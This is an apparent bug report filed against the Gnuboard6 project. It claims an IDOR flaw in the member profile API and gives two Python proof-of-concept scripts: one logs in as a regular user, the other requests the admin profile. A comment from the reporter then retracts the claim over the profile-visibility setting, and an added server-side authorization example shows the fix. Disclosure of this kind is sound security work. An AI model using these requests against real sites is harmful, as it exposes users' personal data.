
Gnuboard6 Issues



Unauthorized User Info Disclosure via IDOR


Summary

An IDOR (Insecure Direct Object Reference) vulnerability exists in the endpoint /api/v1/members/{mb_id} which allows any authenticated user to retrieve arbitrary user profile information, including administrator accounts, by simply modifying the mb_id path parameter.

This constitutes a serious vertical privilege escalation (CWE-269, CWE-284) and sensitive information disclosure (CWE-200).

Step-by-Step Reproduction (PoC)

1. Register and log in as a regular user to obtain a JWT access token

import requests

# Token endpoint of the local Gnuboard6 test instance
url = "http://localhost:8000/api/v1/token"

credentials = {
    "username": "test",      # regular (non-admin) test account
    "password": "1234"
}

# POST the credentials as form fields (data=, not json=)
res = requests.post(url, data=credentials)

if res.status_code == 200:
    token_data = res.json()
    access_token = token_data.get("access_token")    # used as the Bearer token in step 2
    refresh_token = token_data.get("refresh_token")

    print("[+] Access Token:", access_token)
    print("[+] Refresh Token:", refresh_token)
else:
    print(f"[!] 로그인 실패: {res.status_code}")
    print(res.text)

2. Use that regular user's token to access the admin profile

import requests

access_token = "<access token from step 1>"   # bearer token of the regular user
target_mb_id = "admin"                        # mb_id path parameter being requested

url = f"http://localhost:8000/api/v1/members/{target_mb_id}"
headers = {
    "Authorization": f"Bearer {access_token}"
}

# Only the path parameter changes; the token still belongs to the regular user
res = requests.get(url, headers=headers)

print(f"[+] Status: {res.status_code}")
print(res.text)

Vulnerable Response:

{"mb_id":"admin","mb_nick":"최고관리자","mb_email":"admin@your-domain.com","mb_point":100,"mb_profile":"","mb_icon_path":"/static/img/no_profile.gif","mb_image_path":"/static/img/no_profile.gif","mb_1":"","mb_2":"","mb_3":"","mb_4":"","mb_5":"","mb_6":"","mb_7":"","mb_8":"","mb_9":"","mb_10":""}

Impact

  • Any authenticated user can access any other user's profile, including admin.
  • Disclosed data includes email, nickname, points, and potentially more.
  • Reflects improper access control and vertical privilege escalation.

CWE References

  • CWE-269: Improper Privilege Management
  • CWE-284: Improper Access Control
  • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

1 comment

I reported this issue without checking the mb_open (profile visibility) setting for the account.
I apologize for the confusion, and I will close this issue.
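An added example (not Gnuboard6's own code) of the server-side check the PoC probes and the follow-up comment refers to: the profile is returned only when the requester is the owner, an administrator, or the target's mb_open flag makes the profile visible to other members. The admin level threshold, the public/owner-only field split and the sample member table are assumptions for illustration.

```python
# Added example, not Gnuboard6's own code: server-side authorization for a
# profile lookup such as GET /api/v1/members/{mb_id}. Field names and the
# mb_open flag follow the report; level threshold, field split and records are assumed.
ADMIN_LEVEL = 10                  # assumed member level that marks an administrator
PUBLIC_FIELDS = {"mb_id", "mb_nick", "mb_point", "mb_profile",
                 "mb_icon_path", "mb_image_path"}
OWNER_ONLY_FIELDS = {"mb_email"}  # assumed: visible only to the owner or an admin

# Constructed sample member table (not real accounts or e-mail addresses).
MEMBERS = {
    "admin": {"mb_id": "admin", "mb_nick": "최고관리자", "mb_email": "admin@example.com",
              "mb_point": 100, "mb_profile": "", "mb_icon_path": "/static/img/no_profile.gif",
              "mb_image_path": "/static/img/no_profile.gif", "mb_level": 10, "mb_open": 0},
    "test":  {"mb_id": "test", "mb_nick": "tester", "mb_email": "test@example.com",
              "mb_point": 5, "mb_profile": "", "mb_icon_path": "/static/img/no_profile.gif",
              "mb_image_path": "/static/img/no_profile.gif", "mb_level": 2, "mb_open": 1},
    "alice": {"mb_id": "alice", "mb_nick": "alice", "mb_email": "alice@example.com",
              "mb_point": 20, "mb_profile": "", "mb_icon_path": "/static/img/no_profile.gif",
              "mb_image_path": "/static/img/no_profile.gif", "mb_level": 2, "mb_open": 1},
}


def get_member_profile(requester_id, target_id):
    """Return (http_status, body) for requester_id reading target_id's profile.

    requester_id comes from the verified bearer token, never from the URL;
    target_id is the {mb_id} path parameter the PoC tampers with.
    """
    requester = MEMBERS.get(requester_id)
    if requester is None:
        return 401, {"detail": "authentication required"}
    target = MEMBERS.get(target_id)
    if target is None:
        return 404, {"detail": "member not found"}

    is_owner = requester_id == target_id
    is_admin = requester["mb_level"] >= ADMIN_LEVEL
    # mb_open=0: the member hid their profile from other members, so only
    # the owner or an administrator may still read it.
    if not (is_owner or is_admin or target["mb_open"]):
        return 403, {"detail": "profile is not public"}

    allowed = PUBLIC_FIELDS | (OWNER_ONLY_FIELDS if is_owner or is_admin else set())
    return 200, {k: v for k, v in target.items() if k in allowed}


if __name__ == "__main__":
    # Replays the PoC: regular user "test" requests the admin profile (mb_open=0).
    print(get_member_profile("test", "admin"))
    print(get_member_profile("test", "alice"))
```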


© SIRSOFT